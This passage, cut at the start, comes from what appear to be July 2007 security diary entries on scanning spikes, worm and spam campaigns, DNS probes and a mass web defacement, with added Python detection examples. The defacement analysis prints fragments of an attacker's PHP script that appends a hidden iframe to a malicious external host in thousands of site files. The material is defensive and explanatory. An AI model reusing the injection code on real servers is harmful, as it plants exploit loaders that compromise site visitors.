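    Pkt("10.1.9.11", "203.0.113.5", "tcp", 80, "S"),
]

if __name__ == "__main__":
    for label, count in sorted(summarize(SAMPLE).items()):
        print(f"{label:20s} {count}")
    print("scanners:", scan_sources(SAMPLE))
    print("spoofed darknet addresses:", spoofed_addresses(SAMPLE))
    print("suspect clients:", phone_home_clients(SAMPLE))
```

scan_sources() and spoofed_addresses() encode the distinction the text calls hard to make from flow data alone: a scanner is one source touching many darknet addresses, whereas a spoofed darknet address is one destination collecting replies from many victims.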

----------------------------------------------------------------

Kevin Liston (kliston -at- isc.sans.org)

0 Comments

Published: 2007-07-07

Defensive Googling

As cousin Tom reported yesterday, system compromises can become embarrassingly public via Google searches (or what Johnny Long refers to as Googledorks.)

A reader saw Tom's post and sent in his own Google search command that exposes many .gov sites compromised to host porn.

It's not a bad idea to use Google as an Intrusion Detection System; it's a bit late notice, but it's better to find out that way than having guys in suits show up at your office to confiscate systems.

Relying on the "site:" syntax you can scan your organization's web presence for embarrassing exposures. For example:

site:myorg.org porn

site:mygov.gov cialis buy

To filter that list down you can add additional qualifiers like Tom's filetype:html (or filetype:htm, or filetype:asp if you run a Windows shop).

These are very simple examples; for additional search terms one could examine what people are looking for on Google using:

http://google.com/trends

http://www.google.com/press/zeitgeist.html

You can also skim through your users' proxy logs to see what they're searching for, with the warning that this might not be legal in your region, and what you find most certainly won't be family-friendly.

----------------------------------------------------------------

Kevin Liston (kliston -at- isc.sans.org)

0 Comments

Published: 2007-07-06

Putting the ED in .EDU

So, you're a low-life piece of Internet vermin, and, like all low-life pieces of Internet vermin you find yourself faced with a dilemma: How are you gonna lend an aura of respectability to your scummy online "pharmacy" service?  Better still, how are you going to make your "pharma" site stand out from all the others?  How are you going to "optimize" the search engine placement for your pill slinging service?

What better place from which to push your ED drugs than... well... .edu?

Try this Google search. 

Interestin', eh?

Looks to me like somebody's been doing a mass hack of .edu sites and setting up web pages to push Cialis, Viagra, and... uh... well... porn.

Sex and drugs.  Now all we need is some rock and roll...

----------------------------------------------------------------

Tom Liston : Intelguardians - Handler on Duty

0 Comments

Published: 2007-07-06

Do you want to play a game...?

No... it's not called "Global Thermonuclear War"... although that's a fun game too...

This game is called "What Are the Kidz Doing On Port 5151?"

Lookie here:  http://isc.sans.org/port.html?port=5151

And, to top that off, we've seen peaks of interest in port 5151 in the past:

February, April, and August 2004
April, July, and December 2005
February and September of 2006

To play, simply click here and tell us what you think.  Better still, set up a netcat listener and tell us what you find (or what finds you...)

0 Comments

Published: 2007-07-06

Incoming!!!

In old black and white war movies, just when you're hoping that things will calm down a bit so the hero can kick back with the rest of his platoon, grab a smoke, and relax for a few minutes... some joker yells "Incoming!" and the shelling begins again.  Just how *does* that guy know when the enemy is going to start shooting again?  I really think someone should question his loyalty...

Anyway... in that great tradition, Microsoft announced that next Tuesday's regularly scheduled patch-a-thon will be brought to you by the letter "C" as in "Critical":  Three critical updates (one for Office/Excel, one for the Windows OS, and one for the .NET framework), each one potentially delivering remote code execution goodness right to your desktop.

Accompanying those three will be a duet of "Important" patches (one for Office/Publisher and one for XP Pro) and a niggling little "Moderate" problem in Vista.

Duck and cover, gang... duck and cover.

0 Comments

Published: 2007-07-06

Yahoo down

A couple of readers alerted us that http://www.yahoo.com appears to be down. At this point, we have no idea why or if this is at all security related. But it does indeed look like Yahoo! is down.

0 Comments

Published: 2007-07-05

Java SE 6.0 Update 2 Released

Java Runtime Environment (JRE) 6.0 Update 2 (as well as all the other variants - JDK, J2SE, etc) has been released.

For more information about the software, please go to java.sun.com/javase/downloads/index.jsp.  The release notes for this update are available at java.sun.com/javase/6/webnotes/ReleaseNotes.html.

0 Comments

Published: 2007-07-05

Odd DNS Traffic

We received a query from one of our readers earlier today asking about some odd DNS traffic that they have been seeing at their site over the last several months.

The traffic is directed at a DNS server that is acting only as a caching server for outbound queries which originate within the local site.  No inbound queries from the Internet are allowed.

The inbound traffic pattern is thus:

1) An ICMP echo-request is sent to the local DNS server.
2) A UDP DNS query for the root DNS servers is sent to the local DNS server.
3) A UDP PTR query for the IP address of the local DNS server is sent to the local DNS server.
4) Last, a malformed TCP DNS packet is sent to the local DNS server.  This packet has the SYN flag set.

This traffic has come "from" many different source IP addresses during this time. For a given instance of this traffic pattern, the four packets all come from the same source IP address.

If anyone else is seeing traffic like this, we'd like to hear from you.
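As an added example (not part of the reader's report or of the diary), here is a small correlator that looks for exactly this four-packet sequence, tracked per source address, over a constructed log excerpt; the log format, the addresses and the "malformed" marker in the TCP line are assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample log (not from the diary): date time proto src -> dst[:port] detail.
# 192.0.2.53 is the local caching resolver; 203.0.113.7 sends the full four-packet probe.
SAMPLE_LOG = """\
2007-07-05 10:00:01 ICMP 203.0.113.7 -> 192.0.2.53 echo-request
2007-07-05 10:00:02 UDP 203.0.113.7 -> 192.0.2.53:53 query NS .
2007-07-05 10:00:02 UDP 203.0.113.7 -> 192.0.2.53:53 query PTR 53.2.0.192.in-addr.arpa
2007-07-05 10:00:03 TCP 203.0.113.7 -> 192.0.2.53:53 SYN malformed-dns
2007-07-05 10:07:44 ICMP 198.51.100.22 -> 192.0.2.53 echo-request
2007-07-05 10:07:45 UDP 198.51.100.22 -> 192.0.2.53:53 query NS .
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<proto>ICMP|UDP|TCP) (?P<src>[\d.]+) -> "
                     r"(?P<dst>[\d.]+)(?::(?P<dport>\d+))? (?P<detail>.*)$")

def stage_of(m):
    """Map one parsed line to its stage in the four-packet pattern, or None."""
    proto, dport, detail = m["proto"], m["dport"], m["detail"]
    if proto == "ICMP" and "echo-request" in detail:
        return 0                                   # 1) ping the resolver
    if proto == "UDP" and dport == "53" and detail == "query NS .":
        return 1                                   # 2) ask it for the root servers
    own_ptr = ipaddress.ip_address(m["dst"]).reverse_pointer   # resolver's own PTR name
    if proto == "UDP" and dport == "53" and detail == f"query PTR {own_ptr}":
        return 2                                   # 3) PTR query for the resolver's address
    if proto == "TCP" and dport == "53" and "SYN" in detail and "malformed" in detail:
        return 3                                   # 4) malformed TCP DNS packet, SYN set
    return None

def find_probe_sources(log_text):
    """Return {source_ip: timestamp} for sources that completed all four stages in order."""
    expected = defaultdict(int)   # src -> next stage we are waiting for
    complete = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        stage = stage_of(m) if m else None
        if stage is None:
            continue
        src = m["src"]
        if stage == expected[src]:
            expected[src] += 1
            if expected[src] == 4:                 # full sequence from one source
                complete[src] = m["ts"]
                expected[src] = 0
        elif stage == 0:                           # a fresh ping restarts the sequence
            expected[src] = 1
    return complete
```

In the sample only 203.0.113.7 completes the sequence; 198.51.100.22 stops after the root query and is not reported.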

0 Comments

Published: 2007-07-04

Port 1433 scanning

Update

A reader suggested that the increased activity on various ports such as 5900, 1433 and some others may be related to the release of the ya bot source code in early June, as it includes scans for those ports.  A quick check of the source code confirms that capability, and changing the ports seems trivial, which may account for the scans to port 5901 mentioned earlier.

------------------------

There has been an increase in activity to port 1433 in the last day or so. 

http://isc.sans.org/port.html?port=1433

As you'll be able to see from the graph, it has eased off a little, but it is still significantly higher than it has been recently. 

Port 1433 is generally used by MSSQL. If you happen to grab a few packets, please pass them along.  If you have the port open and you receive a delivery, please pass that along as well.  It would be interesting to see if this is new or not.

With all the activity on the net at the moment you'd think there is a public holiday or something. 
To all those in the US, enjoy the 4th of July.

 

Mark - Shearwater

0 Comments

Published: 2007-07-03

Port 5901 scanning

Will the internet come to a grinding halt on July 4th ? Should we start preparing the first 'crackberry' detox centres? Not really. However, according to media reports something does seem to be amiss. Some outlets have reported on the major increase in port 5901 scanning we're seeing in our (your) logs. This increase is not uncorroborated. Others are reporting very similar increases.

Port 5901 is generally used as the first VNC (Virtual Network Computing) display on Linux machines, and the second one on Windows hosts. There are a number of popular implementations of VNC, of which the most popular are UltraVNC, TightVNC and RealVNC. A number of recent security vulnerabilities have added incentive for attackers to start indexing hosts running this service. In 2006, for example, RealVNC allowed authentication bypass, while UltraVNC was plagued by a number of buffer overflow vulnerabilities.

No reason for panic just yet. It likely indicates attackers may have been successful in compromising a number of hosts using vulnerabilities in this service, increasing their belief in VNC as a viable attack vector. It could also indicate the release of new attack tools.

As such, if you notice any machines on a network under your control scanning for port 5900 or 5901/TCP, we'd be very interested in hearing what the result of your investigation was. Did you find any new tools, or was it the same old "VNC_bypauth" ? Get in touch with us here. Thanks!

0 Comments

Published: 2007-07-03

Storm worm spreading with new subject lines

We've been receiving numerous mails from readers reporting new subject lines being featured by the Storm Worm. Below is a brief overview of those gathered so far (thanks Michael, Frederic & Robert).

Celebrate Your Independence
Independence Day At The Park
Fourth of July Party
American Pride, On The 4th
God Bless America
Happy B-Day USA
July 4th Family Day
Your Nations Birthday
July 4th B-B-Q Party
Happy 4th July
4th Of July Celebration

0 Comments

Published: 2007-07-03

New mutation of PDF spam

A few weeks ago we reported on new spam using PDF attachments. These were professionally designed and contained graphs and detailed information on the stock in question. In general, they covered one stock on the Frankfurt stock exchange each.

During the last two days, we've received continuous reports of new PDF spam. This time the pages attached are generally of different size each time (no longer A4, but 4x3 inch or 6x1 inch). The text also has been obfuscated which makes it much less readable, but also more difficult for spam filters to assess through OCR.  Stocks mentioned are now listed on NASDAQ instead of the European exchanges.

0 Comments

Published: 2007-07-03

Incident response for the mobile enterprise


A lot of chatter has appeared on the security of Apple’s new iPhone. As with any new technology, it is to be expected that some security issues will be identified and fixed.
 
More importantly though, the phone’s release indicates we as security professionals should be prepared to investigate security incidents on mobile devices. This new generation of smartphones is much more likely to be purchased or requested by employees as a status symbol than is the average laptop. As such, it may be used to transport corporate data and could fall within the scope of a forensic investigation.
 
Unfortunately, mobile phone technology is technically harder to investigate:
 
  • There may not be a clear distinction between which memory space is used for data and which is used for processes. Loss of battery power generally leads to loss of evidence;
  • In most cases you can only acquire data ‘logically’, by requesting it through the phone software. In those rare cases where you can ‘physically’ dump memory as an image, this may still depend on phone functionality that can be ‘flashed’. As such, integrity of evidence could be a serious issue;
  • An attacker could still be able to connect to the device remotely if it is not kept in a shielded environment.
Organizations should therefore take a number of decisions regarding the use of cell phones. One example is whether they should provide employees with cell phones, or instead support a number of acceptable ‘employee-owned phones’ over which they may have less control. Policies should also be developed to govern the use of mobile devices.
 
Incident response groups should commence the first step of the incident handling cycle: Prepare! This includes adding the necessary tools, skills/procedures and hardware to fully support investigations on mobile devices:
 
  • Tools can include free software such as Tulp2g, or one of the many commercial packages. The NIST offers a great tool review for mobile forensics;
  • Skills and procedures can be gathered through training or exercise. One great resource is the NIST site;
  • Hardware should include a SIM/USIM card reader (generally a regular smartcard reader which supports the smaller format), the necessary cables to connect your supported cell phones to the analysis workstation, as well as an RF shielding bag to prevent evidence compromise.

Some other issues may require review with your legal team. Some of the data stored on a SIM/USIM card, for example, may allow an investigator to broadly assess the past physical location of a cell phone user. This could be a very significant privacy issue.

--
Maarten Van Horenbeeck

0 Comments

Published: 2007-07-02

iPhone scams

Readers have been reporting new e-mail scams related to the Apple iPhone today.  With a wide variety of new topics to choose from over the weekend, the iPhone apparently came out on top.

One e-mail claims you have ‘won a new iPhone’. Clicking on the link however brings you to a page that attempts to exploit a number of well known Internet Explorer vulnerabilities and then downloads a malicious executable 'sys----.exe'. This executable installs itself as a service and upon review appears to be a spam bot.  Anti virus coverage was very spotty this morning but has improved during the day.  

Another scam aims to convince readers they need to go and buy an iPhone on what appears to be an Apple site (faked using a browser helper object). Naturally the site does not belong to Apple and you end up paying someone in Latvia. Sunbelt has a great writeup on this here. Thanks to roseman for the link.

0 Comments

Published: 2007-07-02

Mass website hosting = mass defacements

A couple of weeks ago we mentioned a large MPack compromise (http://isc.sans.org/diary.html?storyid=2991). As you are probably aware, thousands of web sites (mainly in Italy) have been compromised and iframe tags added that pointed to other sites hosting exploits.

After checking where the compromised web sites were hosted, it became clear to us that we were dealing with a mass defacement in which a single physical web server (or a few of them) was hosting thousands of web sites.

One of our readers sent us a PHP script he acquired from a compromised web server. The PHP script is pretty simple, and all it does is traverse through the file system and modify all files so that a malicious iframe tag is appended.

Two things were obvious here:

  • The hosting web server did not have proper security on the file system level. This is, unfortunately, pretty common for (cheap?) hosting servers and is required when PHP is executed as a module in Apache. In this case, the main Apache process must be able to at least read all the files, but it appeared that it was able to write to them as well (wrong file permissions maybe?).
  • The attackers had to find only one vulnerable PHP script on the server (note – the server might have been hosting thousands of different web sites).

Once the attackers found a vulnerable PHP script, they first detected the directory hierarchy on the web site. In the case of the sample PHP script we received, it looked like this:

  for ($i = 3; $i < 500; $i++) {
      if ($i == 438) continue;
      flush_buffer('<b>/home/sites/site' . $i . '/web</b>:<br>');
      iframe_account(array('/home/sites/site' . $i . '/web'));
  }

From the code snippet above, you can see that all sites have their document root directory set to /home/sites/site[number]/web. Each iteration of the loop wraps one such path in an array which is then passed to another function called iframe_account().

This function takes every directory and performs a recursive search for 4 file types:

  $file_types = array('php', 'htm', 'html', 'tpl');

It then opens the files and searches for the “</body>” tag which is replaced with the malicious iframe and properly closed:

  $iframed_content = str_replace('</body>', '<iframe src=http://[REMOVED].info/counter style=display:none></iframe></body>', $content);

And voila – a mass compromise happened.

Conclusion

The main reason why this attack was possible was the fact that Apache’s process must be able to read all files (in order to serve/process them) and that the file system permissions were not correctly set. It remains questionable how many big hosting sites are affected by this (poor) setup.

As far as I know, the only proper way to do this is to run PHP as a CGI program and use chroot and/or suExec with Apache. Only then can you make sure that one user’s web site can’t affect everyone else on the server. Of course, this has its price in performance, which is why some hosting companies decide to sacrifice security instead of buying extra hardware. A nice document describing this setup can be found at http://www.seaoffire.net/fcgi-faq.html

PHP’s safe_mode, despite its name, doesn’t imply that you will have a secure environment. On the contrary, it is possible to work around the safe_mode requirements. This caused so many problems that the PHP developers decided to remove safe_mode from PHP version 6.

So, be sure to check if your hosting company uses chroot and/or suExec because that is the only way to make sure that your own web site will not be compromised by other users sharing the same physical server.
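As an added example (not the reader's script and not ISC code), here is a defensive scanner for the four file types the script targeted: it flags files carrying a hidden iframe injected directly before </body>, and it also reports files the user running it can write, which is the file-permission problem the conclusion describes when the scanner is run as the Apache user. The sample pages and the placeholder iframe target are constructed.

```python
import os
import re

# File types the diary's script went after, and a pattern for the kind of tag
# it appended: a hidden iframe placed immediately before the closing body tag.
FILE_TYPES = ("php", "htm", "html", "tpl")
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe\b(?=[^>]*display\s*:\s*none)[^>]*\bsrc=['\"]?(?P<src>[^'\"\s>]+)"
    r"[^>]*>\s*</iframe>\s*</body>", re.IGNORECASE)

# Constructed sample pages (not from the diary); the iframe target is a placeholder.
SAMPLE_CLEAN = "<html><body><p>Welcome to site42</p></body></html>"
SAMPLE_INFECTED = ("<html><body><p>Welcome to site42</p>"
                   "<iframe src=http://placeholder.invalid/counter style=display:none>"
                   "</iframe></body></html>")

def find_injected_iframes(content):
    """Return the src of each hidden iframe sitting directly before </body>."""
    return [m.group("src") for m in HIDDEN_IFRAME_RE.finditer(content)]

def scan_document_root(root):
    """Walk one site's document root (e.g. /home/sites/siteN/web) and report
    targeted files that carry an injected iframe, plus files the current user
    could write. Run as the Apache user, a writable file is the precondition
    the diary's script relied on (run as root, every file shows as writable)."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.rsplit(".", 1)[-1].lower() not in FILE_TYPES:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    srcs = find_injected_iframes(fh.read())
            except OSError:
                continue
            writable = os.access(path, os.W_OK)
            if srcs or writable:
                findings.append({"path": path, "iframes": srcs, "writable": writable})
    return findings
```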

0 Comments